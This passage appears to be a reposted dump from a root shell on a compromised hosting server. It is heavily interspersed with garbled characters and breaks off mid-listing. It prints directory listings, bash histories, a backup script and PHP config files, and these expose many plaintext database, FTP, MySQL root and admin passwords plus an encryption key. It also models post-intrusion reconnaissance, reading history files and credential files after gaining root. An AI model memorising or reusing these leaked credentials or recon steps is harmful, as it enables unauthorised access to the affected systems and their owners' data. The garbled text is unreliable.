: Q8 w: u- l$ `3 m9 E: X. ?# |__| [__ | |__| | |__| | | | [__ | |__| #0 L g3 f* `' N3 e/ \" r
# | | ___] | | | |___ | | \/ | ___] | | | #: r- a) D' u9 S
# #
9 [6 w) z! r0 e! k2 N#####################################################
7 g# X1 w3 Y* w, C# B& w$ n0 C" c |# #4 \4 b; t: |4 A4 {7 s
# Admin Contact - 链接标记support@secureservertech.com #- ~5 [/ z, t% c6 W O; M; \
# #
, x4 t! S" Z$ _7 S# Available ShortCuts #) q: T# f% k+ D' c7 s% X/ d
# #9 V) B1 K5 [- E ~
# nst - list active connections #
; W X7 f0 [( u# ddos - shows how many times each ip is connected #
4 O/ q6 E! l: O# Y& U5 D8 @# e9 o# ltr - restart the webserver #' D1 U1 J" P3 i" u: M: A! o
# phpc - edit the php config file #5 I" a- U+ ^* S* y" B- Q
# htc - edit the webserver configuration file #
. ~( z/ v/ @8 C7 w# up - uptime #
f! ]( m4 ]# Z |5 @0 k# etd - edit the motd of the day file #
- h$ E( h% ^3 y# htr - start and restart apache if needed #3 x$ D/ V9 X( B2 [: I# i/ C
# syng - shows active SYN_RECV connections #
: ?4 N. I$ D E4 T. l" g* f# synd - syn flood blocker - “synd -h” for usage #' f1 ~# U0 g- E0 @/ S8 N7 a; J
#####################################################( |- k7 j' O7 E! p) s
# NOTES: #
7 I1 Q% J2 B& P$ z8 v0 N% X# Last Upgrade - 12-08-2008 by JF #* N- G, p2 [% R$ {+ q3 R. l- `7 k
# My.cnf/Mysql Optimization - 1-28-09 #
; [4 J0 {. q. |! a) a. ^, t# #; [! A& r: b& l4 c
# #6 s7 a) e. g0 l/ d/ y c
# #$ K# d& f2 r* S
#####################################################3 \& C4 [3 k& ~( ]
" R, ]2 V& J/ U( l
sh-3.2# lastlog | grep -v Never" y" }8 g- J1 o4 i
Username Port From Latest
9 D ~3 y! L; i1 Mroot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 20095 @# f' p* C% k0 Z
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008( ]1 x3 @% {2 q: I' n3 K7 T
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 20092 ?9 p4 f7 e6 E6 ^7 ]( J
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009, V7 T( a' b( M
: j# z- P" F& I9 f* J
sh-3.2# ls -la, P1 n8 u8 `+ r. P0 S) |
total 453376
& r4 V5 g! ?1 b _5 l6 p0 qdrwxr-x— 15 root root 4096 Jun 4 08:40 .
; [3 ^3 V9 |+ i' _% @3 g$ |drwxr-xr-x 25 root root 4096 Jun 3 02:43 .." h* m% b# {) }" l7 ]
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
# H, q7 U; m# [; [4 r2 x) X-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg$ Z& f7 k# Z+ o: t3 n% W- p
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
4 P& I W$ i( q) _0 c. {-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
& Z" a- b' J0 L( S& z-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile, T5 u+ O8 }& s9 i! |
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc* C# l' C: z/ L2 C
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
2 \4 J2 W* W4 S0 x6 R3 G2 L-rw-r–r– 1 root root 1327 Nov 29 2007 cert8 T& M2 F! d2 n+ q, H
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql1 q% \2 i9 f9 s# _ I. |$ {
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan4 f5 O& |$ ]9 f! A3 l6 S
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
9 G' r, o5 }7 S: K! r-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql3 w1 j) ~) \' x4 M
drwx—— 2 root root 4096 Oct 28 2007 .elinks+ Q$ |6 g8 s% g" d- d# m7 h) h
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
( J5 l* `& s* B) E) T' e, {7 d& i-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
; g( Z: ~+ {# v |+ X-rw——- 1 root root 0 Apr 16 13:19 .history4 F: W& v4 D) e6 L
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
3 P! o" c; o$ w-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
/ G* K. P# }9 T6 U: Y-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh+ H Z) g6 i- X9 R9 ]+ \' F
-rw——- 1 root root 35 Jun 2 14:23 .lesshst- n( {4 u! d' r
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp# V \. l1 p% _! C( Q9 t- P
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec& t; Z, |6 \7 n
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
( m# X3 r0 v( _7 m b-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
- s( e: x$ C1 K: I: y0 Y& D-rwx—— 1 root root 760 Sep 18 2008 lp
, |) A+ C) Z: F9 g) }0 Kdrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
' T+ H; \5 T+ a+ i" d' _3 ], y-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
, ^" I# o1 L% t0 \( H q-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
; K/ c% r3 ?8 c) N+ g, D: Pdrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9, @8 A6 S0 y0 `) s
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz* b3 j8 W" \, V1 v8 W
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3: m% O3 `) D% V6 ?: D
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
7 N& W5 A' S" M# A9 X1 V-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh( F' y/ B- A& P3 e U
-rw——- 1 root root 41 Oct 19 2007 .my.cnf4 ^7 F& t( g$ k8 ]) b1 {
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history+ G" p* C6 l! K0 ]; \1 v
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
# E% o; q; A5 \! f# E9 t' R1 P-rw——- 1 root root 41 May 20 2008 .mytop- S; B1 o% I) ~ U4 X; m
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
/ {, J0 H2 ]" c2 `( v3 T- u-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz! v1 K9 z; Z8 K9 [# ]
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
m- `0 I& K5 Q/ ^-rw——- 1 root root 1462 Sep 21 2007 opt.php1 a# _5 x# q2 B! @* h9 d
-rw-r–r– 1 root root 3371 Sep 22 2007 p
' g" H( q. u H( c7 z! \7 r% B# d-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2 {4 z# Y+ w" Q1 z( o
-rw——- 1 root root 1024 Feb 3 21:32 .rnd6 i) a+ _* {- V1 {4 z. ]* Y
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr5 t3 Z9 u% j. w3 f) J
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
3 [/ D( I# w5 g' p, L; y. c( |drwx—— 2 root root 4096 Oct 10 2008 .ssh
( D4 {9 _% J# u; A& k% v& x-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
]( ~6 e6 a9 i5 @; a: {-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc0 _! V6 h+ y- Z# G7 {
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
- f% O6 d) Z2 B3 M4 b' O& u# X-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
7 E$ R* Q; |- j' L. Xdrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
/ C% n4 \- J/ j) G" g5 D5 Y: W-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
7 k& _3 N) t+ D/ p3 Hdrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0& E3 K6 K6 [* C3 d) W0 T. T) }
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
( Z0 a2 V% t$ s& J* {% K( K0 \-rw——- 1 root root 12997 May 16 2008 .viminfo. x9 t; _, {' `6 g( Z4 m+ a7 L
3 D, E5 g- E5 V5 S+ z* b1 f) M
sh-3.2# cat .bash_history0 l' [/ Q& S# J+ Y- p. U& ?
[snip]
/ {: V: S( q' H, lwget cp4sst.com/sstlinux.tar.gz
: i3 \: a% |1 J( P- }tar zxvf sstlinux.tar.gz6 [! z/ h. j l6 J% p
cd linux-2.6.27.108 `! c2 k: a* ]- O/ @+ @
sh install.sh! v, a+ J0 r" V
make bzImage ; make modules ; make modules_install ; make install
5 s" k+ J5 E4 l. F( O+ Q7 qmake clean
& T8 e" W/ H0 H+ C6 y- f' M, eservice mysqld restart
, C% a& M1 M" v2 @[snip]
1 G9 H# u( i A% K/ n, Mcd /usr/sbin/" G" w9 \3 V8 D' N! I- O
chmod 4777 traceroute# l1 ]) J/ i I+ `2 F0 r' c
chmod 4777 ping
: E# d/ q4 a3 |( f _+ ^, vtraceroute -I 链接标记[url]www.astalavista.ch[/url]1 Y# ~6 t- a$ y1 b' y8 @
[snip]
- r) ?# G8 S- R% f7 \vi /etc/csf/csf.conf9 u A& S3 h3 c: Q$ Q! i, Z% F
traceroute google.ch
' o* _/ @2 s. E- Q6 f; tservice csf restart
/ _: ~7 H, B i) p9 u% ^tracert google.ch
! `3 M1 a ]% J- {$ B" m, lservice csf restart3 {" j9 O4 e& w3 A0 ?( d \6 b
traceroute 链接标记[url]www.google.ch[/url]) Z+ t6 G% {7 r9 `! ^+ ^
tracert 链接标记[url]www.google.ch[/url]2 ` F- N- ^% X8 n
traceroute 链接标记[url]www.google.ch[/url]
! ]; ]7 [* l- [4 a$ w+ g- Wlocate traceroute1 S; X; q6 j2 v3 K7 @4 j: T0 A* N/ \% g' C
chown 4755 /bin/traceroute* @9 P0 v/ K" l/ I
chown 4777 /bin/traceroute
, B3 |9 I/ c4 \; p% |. V* ]6 w$ m& rlocate ping; w" ~0 ] l* c. i2 {
chown 4755 /bin/ping4 B( j/ P. |( f( A$ a( y
chown 4777 /bin/ping
, T& W5 X+ B0 k9 Xcd /bin/1 v: v: f) Z5 _) Y7 d* y
ls -ali | grep ping
4 a- ?1 t$ b9 }+ V8 b+ \: f: Zchown root ping! T6 f7 v& ^- ?% @( e
chmod 4755 ping1 {8 A7 c/ k% I, Y2 P2 {
ls -ali | grep traceroute
2 c: u& P+ O Z0 ~2 p( }chown root traceroute+ S" ?1 `& R- \) W3 N2 C/ {
chmod 4755 traceroute
) _. r# j. I4 T, E6 u4 |* Cls -ali | grep traceroute% t& v; B7 L- c. K2 x3 i+ Q
traceroute -I 链接标记[url]www.google.ch[/url]
! K/ ~3 A$ h/ S& E- p q4 Wtraceroute 链接标记[url]www.google.ch[/url]
3 D! X% H- x+ _whois pmsantos.ch r. s0 ^% G1 u6 K" l
[snip]0 Z0 I6 Z4 }( l, p1 s
mysql -h com_contrexx2_live < /root/defaultp_ports.sql
! T2 t# K) W4 g6 }$ g& w/ {mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
/ }+ M4 I: T3 f7 K3 `mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
! [6 k4 s; {" lmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql4 H, H9 O9 s1 K3 n) G4 N. `, U' u/ p
top% K# n" \2 a) n$ c; X q
ping ssth.ch* u) N: }7 N& D) E' ]1 @1 S8 G6 i7 f
ping asdlkfaljgasd???ljg???lasj.ch
* H' H/ @) o8 _) h" ^) P- lping asdlkfaljgasdlasj.ch
0 B( R/ M) V- K+ V4 Wping 链接标记[url]www.ssth.ch[/url]
9 |( p" e9 [/ X' Yping ssth.ch. U4 ~# |9 W/ y" V: U
nslookup 链接标记[url]www.google.ch[/url]) d4 \; N. g7 }2 I5 a1 k. h
nslookup 链接标记[url]www.ssth.ch[/url]) t# _; R8 F4 e* E" ~' K, P: `4 l: o
man nslookup; |0 P8 `& }- y& j" Z
ping 链接标记[url]www.google.ch[/url] t% R; K7 ]! K( R, w
nslookup 链接标记[url]www.google.ch[/url]
6 F" l( e5 _7 Vnslookup 链接标记[url]www.google.ch[/url]
+ v' `, Z3 {! w' Y% Cnslookup salfjasdlf.ch
4 C- k _1 ^) P, t) N9 L# G0 u$ S[snip]
8 a4 t6 I% S/ R9 c; \8 o, X6 \openssl passwd -1 sadf/ z& _* h/ S. }0 U
openssl passwd -1 5cZNHstdTy
, }, S9 l( w6 Q9 p$ Bmysql
8 ]. P' P! d# ?8 J* G; g* @mysql
. A+ S w& M% p2 q' Xlocate proftp
5 e6 Y# V) |1 hvi /etc/proftpd.passwd, n: J7 l* Y3 [3 e& [
service proftpd restart
0 o$ }2 q/ M- s! Hlocate proftpd.conf# v# A) p% b8 X5 m L) A
vi /etc/proftpd.conf2 J1 K8 y' x4 p6 H7 q7 t) |! O
vi /etc/proftpd.passwd' e3 B) P, d( X+ n
service proftpd restart
6 ^8 {7 P# h, i4 |[snip]
. O- K/ t T \3 X/bin/sh /home/com/backup_system/backup.sh
7 n9 n: Q/ F7 Mtar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
9 a$ L+ {6 m& O$ D5 G( {& Y) a! Smysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
" e1 ^ U/ u) }# i! |: zmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql. A5 n: N' `, U: i% H) _2 T( y
ls -ali
: o$ n: M9 p1 Z _- \mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
, W7 ^# ~ p0 U% ~' Qmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql0 n) N z4 L! A% B3 {- @. u7 i4 W6 [
crontab -l
, C `3 f* K( acrontab -l
) j! f: h, r/ c% @5 x% O+ {; ?php -q /home/com/public_html/modifications/cronjobs/securitynews.php, t/ X# O( h" U' W9 d+ X& ], x
/home/com/public_html/modifications/cronjobs/exploits.sh
4 k1 d* _* t0 u& v+ l$ s- kwget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]5 u2 n( n2 S' G& W/ J9 d4 t
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
7 W6 l+ S; b4 b( _% I% J8 t3 ^cd lsws-4.0.38 O' ~6 E3 u* F
sh install.sh) x! c* q/ R( s3 R% |; F
uptime
" Q+ w v5 Q5 u9 c! L, z8 q7 shdparm -tt /dev/sda
3 J/ w: L2 f1 Yiostat
) ]; V4 v& o$ }9 s0 L7 x- C) T& h* Myum install iostat3 _: k+ w+ b; [- g8 J# U8 d
iostat
) ]& _- Y, s. a3 }. a) m+ T$ |9 v G. cwhereis iostat9 C# F/ e/ `; O+ k) q
yjm clean all
& S2 p2 `9 h8 F. B! t$ vyum clean all ; yum -y update: f4 |) C: L. Z; H( B5 L
iostat
* E ]7 ]: s$ s9 T' o8 K* nyum install systat
. `9 y2 L# E/ z# e2 yrpm -qa | grep iostat, _' A% P( R* o2 b6 |! H+ X
rpm -qa | grep sysstat1 x9 L; j! |+ R. Y: j
rpm -qa | grep systat# O: c1 X4 u; x4 k; I+ j! C: L
dmesg -c
- X& L: e, q7 B% r$ bsysctl -p( o, a+ W3 `! q2 F
uname -r3 m+ S L! b" Q- d
cd /usr/src
8 T6 v( Y7 d' Y, o5 twget nix101.com/kernels/sstlinux.tar.gz
$ e( V8 Z& ^( G9 \6 x* _shutdown -r now
7 q6 y4 h+ a# t5 _+ \nano -w /boot/grub/grub.conf
6 f3 r* H, x6 U8 u1 g2 l9 O/ \6 i
sh-3.2# cat .my.cnf' _1 O7 v1 G3 z; z$ R9 I, n4 J
[client]9 D; P7 W: m$ B8 U
user=da_admin& s- B. V) Q. Z; {
password=X9dctmRH7 Q7 e8 p; a( C/ _
) P# n" l5 K f& `/ l/ t% v) F
sh-3.2# cat /home/com/backup_system/backup.sh+ a3 q# }3 m X- F/ ?
#!/bin/sh
7 \) A9 }" u% ]; }3 o##################################################################### s8 N& b5 O5 C/ C" e/ ^/ T h( ]
# #
! f' I8 i" U! F0 _: U1 H# incremental backup for astalavista.com #
8 @5 W6 q2 o* u3 S) g% j3 ]# #
5 [; O, ^4 o. o* B4 G8 m0 l# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #; X; [! P, E& }: R( |2 h
# # I8 [' J! m) u6 p/ v
#####################################################################. f# c9 b$ M8 O+ Y4 u5 q- b1 j
[snip]4 ~7 D1 W0 t" E! ^0 ^
PROG_DIR=”/home/com/backup_system”;
8 Y2 W' X( c0 D( t" ~/ aBACKUP_DIR=”/home/com/backups”;2 e! f S5 o0 J" J/ p: p( C
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
# t4 T7 ^4 Q2 S3 ]0 \# ftp for synology backup server
# u! L' K1 u6 \. L/ z, _FTP_HOST=”212.254.194.163″;
9 X3 b) Z( f/ Z Y" ]2 T* RFTP_PORT=”21″;* U; G+ r) d3 `: H
FTP_USER=”astalavista.com”;
' v2 r* \8 a6 d; bFTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;1 ^* W- R. i5 f2 h3 u
FTP_DIR=”/astalavista.com”;
# I7 u1 D8 A @+ \/ V l+ A9 U, d1 d3 \# database1 Y, A$ ~5 _: `* \
DB_HOST=”localhost”;
3 h2 b9 @ { t3 {% ?9 X4 ?) pDB_USER=”contrexxuser2″;' p6 w- }5 ?' S Q
DB_PASS=”0fEYNZgXz1pKe”;
: V, _- m1 b$ P+ I$ q' I/ g @: [DB_DATABASE1=”com_contrexx2_live”;) j: L, [% P! A- K% S! ~4 A* Y. k
DB_DATABASE2=”com_contrexx2″;. i, j& a/ h0 u2 _. q+ `
[snip] n0 S5 [* j4 u- s2 L
ftp -in $FTP_HOST $FTP_PORT <<EOF0 f1 N1 V4 S( ~* t( @. L
quote USER $FTP_USER
9 B, j) M6 f- Mquote PASS $FTP_PASS- [) ?. a! \' O5 e4 R
cd $FTP_DIR
" j) Y. S/ F, @put $DB_FULLNAME-SQL_Dump.tar
4 V5 `1 W' j yput $BACKUP_FULLNAME-Public_HTML.tar
. m6 x0 }2 {6 F3 r* pclose0 Z$ r9 e$ {5 N# o; a4 q" \* ]
bye
! o; F* W( v+ m) C9 ?, uEOF
* Z, z9 C+ K2 w$ l1 R1 x) U. K* K: e+ ?% p" ~8 N3 o& Z
sh-3.2# cd /home O6 e) L5 B7 A' e/ x
sh-3.2# ls -la9 n: V4 F" [. c
total 120
; X' R7 R/ \8 udrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
4 `! I! V% N" ]drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
0 ^8 |. n f0 \; a1 D U5 P {- |drwx–x–x 9 admin admin 4096 Nov 28 2007 admin1 L, o0 d/ Z. ^$ J5 K9 |
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
, J: T% r, f4 H) y/ n+ b! p* d7 {' C-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
H$ q2 I k6 I) }6 cdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
/ p' u. T* t* Ndrwxr-xr-x 2 root root 4096 Jul 29 2008 backup% _" c5 \9 P2 e+ i/ v; ^$ }
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
4 P7 m! _3 T/ s7 S# S3 p# o4 K! @drwx–x–x 10 com com 4096 Apr 28 12:40 com
0 D! H8 m# ]5 u, n; Qdrwxr-xr-x 2 root root 4096 May 17 2007 ftp
: S; P) H6 X9 G. d( ?! _1 {drwx—— 3 jon jon 4096 Sep 21 2007 jon
) w+ Q& C) O4 j/ M5 v+ ?5 Z3 Ydrwx—— 2 root root 16384 Sep 11 2007 lost+found
k% h1 G# c) x/ r+ Rdrwxr-xr-x 2 root root 4096 Sep 14 2007 my1 `0 l3 t6 {+ x; X! T1 r: A
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata. C w: N" n4 D1 q- q8 }
drwx—— 2 jon jon 4096 Sep 15 2007 test
7 Z% D: } f3 Qdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp' e* N0 j7 K* r$ s& b
, N3 j. z s0 U# q& ]% D7 Q
sh-3.2# cd admin3 \ o! {* p. M8 L+ e u: i3 {
sh-3.2# ls -la( X9 Y( r, ]3 X5 h2 O( \( O
total 17358965 C5 x( E7 ^$ s+ O1 d
drwx–x–x 9 admin admin 4096 Nov 28 2007 .1 r8 w& f+ q* S: {
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
5 S9 u9 Z# x# i1 Y2 Xdrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
$ E$ r) o: w. K! I1 p% t+ Z3 \6 i# Bdrwx—— 2 admin admin 4096 Sep 28 2007 backups+ S8 ^5 x0 l+ A- l( C* U6 L$ Z
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history2 G! D0 o+ p' O; h" T( |
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout B, u/ z8 f$ V/ R9 \
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
. h3 f( v! p3 R! s4 |" n7 w( F3 }, x2 k-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
, s' _- O2 O h* Jdrwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
8 w7 _& t8 i, ?6 v/ r+ ydrwx–x–x 6 admin admin 4096 Sep 21 2007 domains
+ @% F" ^ h$ ]' e5 udrwxrwx— 3 admin mail 4096 Sep 21 2007 imap; P& X. [, ?3 K) y8 o7 f
-rw-r–r– 1 root root 24 Sep 21 2007 info.php4 A) P) W/ x) g2 Z
drwx—— 2 admin admin 4096 Sep 21 2007 mail
8 v' o) H- R9 l, n+ C J-rw-r–r– 1 root root 716 Nov 28 2007 server.csr% w: \5 o: `* x* Z) }* h
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
4 d/ ~) x/ G* r-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow, W$ h0 G* K1 C
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
9 l* o" Z3 {$ o* z+ rdrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
# C9 g2 n* `' T/ f# h! k% d' j: Y# ^; b7 ?. D
sh-3.2# ..& I' O& A+ i- d- B, W
sh-3.2# cd jon
5 ?- t% K$ T6 ^sh-3.2# ls -la& a+ b- M- |% ~6 R6 R+ O9 I
total 36
) \8 q$ C$ p' T* l3 Y5 D0 H- ^drwx—— 3 jon jon 4096 Sep 21 2007 .2 R& H, i& w' Q/ U: y# k
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..3 e0 _8 P3 |: J$ H# {0 s
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history. K/ @4 v: v) z5 @
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
/ X5 L: v5 P+ H7 o+ C) j: N-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
8 S% N8 w) @# L; |1 f: w-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc/ c4 _6 X/ Q$ Y. g3 P
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
1 u/ A% h l/ x" d' ~drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
4 h$ b# A* p. f
" L5 ~- E* J" F6 P9 n- `sh-3.2# cd ..# a# b, m% }$ n% E4 D
sh-3.2# cd test, p6 V1 n D) F
sh-3.2# ls -la( f9 l! t5 S |" p! P8 p
total 48
- d6 I* _" u) ~: W: r |drwx—— 2 jon jon 4096 Sep 15 2007 .
; n; b5 A0 G/ J. ydrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..; g) h6 P/ I7 o" d
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history' V/ E6 q9 x$ a
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout. o3 I* s- J' V5 d' c& u; J0 y8 R, A
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile9 O* |$ B1 {2 F% t
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc7 D* ?% F; u: Z( Y5 @3 ~$ \
sh-3.2# cat .bash_history
w- d. l2 ?! Z" j+ s. c- ?/usr/bin/mysqladmin -u root password PoliuJhytg67
J ]+ ?; C3 i8 n
. N7 q/ d5 [" V( k0 C! x/ _sh-3.2# cd ..
* Z! V1 n7 v( [- _sh-3.2# cd astanet) _% C+ K. G2 a, H% @; t. I
sh-3.2# ls -la
+ z3 l2 X9 \% b0 [total 52! n$ s/ m( r5 w- K% A" T
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
) t3 J: q4 a& l. Q/ O& J3 J. J7 zdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
! |3 ? G, g$ i( x: J) D3 K8 ^: _drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
$ b: ]% _: b# o7 F+ v. _9 f-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history( I+ X9 D* O3 J/ |9 ?( W' o
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
( m8 X- F3 _& ?-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
6 ?, S- L) S' u1 t+ {+ \: P2 h-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
% w' ?0 }9 A7 Z4 E' hdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
# [+ w/ `6 B2 p Z5 {drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
$ ~" v5 b5 L+ J7 q% U0 |% k3 Gdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail! A) k H" c9 W& P
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
; Z \. u/ Z6 ]! J( D! k" xlrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
0 f8 X5 O7 o2 G6 C$ J-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
0 @1 {4 o* ^6 K( O; G$ u
# J1 g) W; \. X2 \( q5 J$ }8 ash-3.2# cd auth/
% D" f C: M' f/ g/ ^sh-3.2# ls -la
# F) I' C2 ]- N9 }. B3 Xtotal 28
: U$ |6 u& ^, ^* X1 Hdrwxr-xr-x 2 root root 4096 Dec 23 16:00 .
h+ `+ y5 a" I( S7 {7 Bdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..! I7 I7 p' u5 _# c
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php7 |7 B! V7 H7 l; t$ B& M
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
% i" n d# I: [8 I5 b-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd
! Q+ F# Y% R& }) g. N( t-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting8 R; V" f! _1 g7 a* V' x
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd% o8 }. ^! P+ E* z5 N) A6 g5 W
/ b- p# s4 ?7 A) A0 f# X
sh-3.2# cat hackercontest.config.inc.php) U2 K9 [/ p* X- _7 ]$ |9 J
<?PHP1 m( t1 f' T! m. v3 B
// Variabeln f?r Verbindung zur Datenbank //
1 f+ m$ q( m3 L$conxHost = ‘localhost’; // MySQL hostname! u5 V+ ^1 K! M; |, ~" x9 U
$conxUser = ‘hackercontest’; // MySQL user" ]& B4 n8 b ]1 i3 p* w
$conxPassword = ‘K6m@7dUc’; // MySQL password
0 H5 y2 v! _6 s, q$ Q' S* N/ @$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish( }6 w0 R: I5 S, {- w
?>
+ A7 A1 Y& `7 x$ H/ t+ A5 U: hsh-3.2# cat hosting.config.inc.php
/ x6 U) J& g5 c9 r: p9 j<?PHP
6 [5 G% Y9 [2 r" s/ b// Variabeln f?r Verbindung zur Datenbank //
% d# ~: _. _& ~* _8 k+ ~$conxHost = ‘localhost’; // MySQL hostname
6 ^0 p/ ~9 _, k' K- ?( a% b3 K$conxUser = ‘hostinguser’; // MySQL user
4 }/ ~: {+ Q# Y1 I$conxPassword = ‘cXvB3981′; // MySQL password1 u* \- n6 @$ h7 B
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
5 |0 A1 Z7 A0 R?>5 `+ w5 N2 q. w" A2 E. r3 X
! P# ~/ }* l! F& D1 [8 c
sh-3.2# cd ..
9 x0 A& s& G, l! Z( }: T7 G5 vsh-3.2# cd com3 Q' r+ S: X1 s1 V! `
sh-3.2# ls -la9 C) a) ^7 b4 o% j
total 1412082 H9 W# V& U8 N) {" y
drwx–x–x 10 com com 4096 Apr 28 12:40 ., I( ^! M$ {' G
